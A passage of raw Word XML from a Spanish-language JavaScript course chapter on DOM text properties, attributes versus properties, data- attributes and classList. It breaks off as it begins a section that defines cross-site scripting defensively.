                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>El marcado serializado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="40A84293" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CC764AC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">La fila del medio: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> depende del estilo, y para saber qué está </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>visible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> el navegador necesita la disposición calculada. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Leer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> fuerza ese cálculo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, con el costo de 4.10; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> no depende del estilo y es barato. La fila de abajo —</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>interpreta el texto como marcado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>— funda RN-F02 y es el tema de 4.7: primero vas a ver qué pasa.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4D70203E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="EFEFEF" w:fill="EFEFEF"/>
          </w:tcPr>
          <w:p w14:paraId="686DFA17" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="595959"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Para no dudar nunca más</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E203BDD" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Con esto tenés resuelto el 100 % de los casos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15A582A0" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="357"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>textContent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> → el 95 % de las veces. Es el que querés.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0990F8D7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="357"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>innerText</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> → sólo si necesitás el texto </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>tal como se ve</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>, respetando lo que el CSS oculta. Es caro; usalo sabiendo que lo es.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19A6F2E0" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="357"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>innerHTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> → sólo con contenido que generaste vos, o pasado por DOMPurify.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34C039A4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Y una advertencia sobre </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>innerHTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> ajena a la seguridad: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>destruye y reconstruye todo el subárbol.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Los manejadores desaparecen, el foco se pierde y lo que el usuario estaba escribiendo se borra. Por eso </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>contenedor.innerHTML += "..."</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> es doblemente malo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6191D84B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc239319991"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.6.3 — Atributos y propiedades</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="3323930F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>atributo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> es lo que está escrito en el marcado; una </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>propiedad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, lo que existe en el objeto del DOM. Al parsear, el navegador crea las propiedades a partir de los atributos, y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>desde ahí las dos cosas viven por separado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CD69CF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;input id="email" type="email" value="inicial@example.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41610F5A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>const input = document.querySelector("#email");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4396D1ED" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>// El usuario escribe "otro@example.com" en el campo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C004FF6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03084233" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>input.value;                   // "otro@example.com"  ← estado actual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE049FC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>input.getAttribute("value");   // "inicial@example.com" ← lo que decía el marcado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D832FE0" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Es la ficha de inscripción y el alumno:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> la ficha dice el domicilio que declaró el día que se anotó; el alumno hoy vive en otro lado. La regla: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>para el estado actual de un control se usa la propiedad; el atributo conserva el valor inicial.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vale igual para </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>checked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, que es donde más muerde.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2A16D01A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDECEA" w:fill="FDECEA"/>
          </w:tcPr>
          <w:p w14:paraId="1CD0815D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>OJO ACÁ: la casilla de verificación</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05FF9039" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Tenés un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>&lt;input type="checkbox"&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> para «guardar mis datos». El usuario lo marca. Vos hacés </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>casilla.getAttribute("checked")</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> y te da </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="384CA077" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>No está roto: estás preguntando lo que no querés saber.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> El atributo dice cómo venía el checkbox en el HTML; la propiedad, cómo está ahora. Al revés es peor: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>casilla.setAttribute("checked", "")</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> a veces funciona y a veces no, según si el usuario ya lo tocó.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EB4D330" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Regla: para leer o escribir el estado de un control, propiedad. Siempre.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Los atributos son para el marcado inicial y para los </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>data-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="483A2C11" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc239319992"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Los </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>data-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, terreno de atributos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="7AB971F9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>&lt;button data-producto-id="42" data-accion="agregar"&gt;Agregar&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37564994" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>boton.dataset.productoId;   // "42" — siempre cadena</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045190CE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>boton.dataset.accion;       // "agregar"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482CE0BD" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">El nombre pasa de guiones a mayúsculas intercaladas. Y un detalle que te va a morder: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el valor es siempre una cadena.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un identificador numérico hay que convertirlo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>"42" === 42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> es </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Por eso 4.8.3 escribe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Number(boton.dataset.productoId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB68B72" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc239319993"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.6.4 — Clases</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="02109DFD" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el.classList.add("activo");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528992E7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el.classList.remove("oculto");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D59745" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el.classList.toggle("expandido");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5718D309" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el.classList.toggle("activo", condicion);   // agrega o quita según el booleano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E64D71C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el.classList.contains("activo");            // devuelve booleano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9D5205" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">La forma de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>toggle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> con dos argumentos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">reemplaza el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> que casi todos escriben</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Y 4.10 explica por qué </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>cambiar una clase sale más barato que escribir varios estilos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0760659B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc239319994"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.7 — Inyección de código en el cliente y la regla RN-F02</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="1826B258" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc239319995"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.7.1 — El problema</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="1F9494F1" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>cross-site scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> —XSS— ocurre cuando un dato controlado por un atacante termina interpretado como código en el navegador de otra persona: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>no es un ataque contra el servidor, es contra los usuarios, y corre con los privilegios de la víctima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22229328" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">El mecanismo es el de la fila inferior de 4.6.2: al asignar a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el navegador parsea ese texto como marcado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, y las etiquetas dejan de ser texto y pasan a ser estructura. De ahí la analogía: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> es pegar el papel en la vidriera; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> es leerlo en voz alta por el altoparlante y hacer lo que dice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23742273" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc239319996"/>
      <w:r>
        <w:rPr>
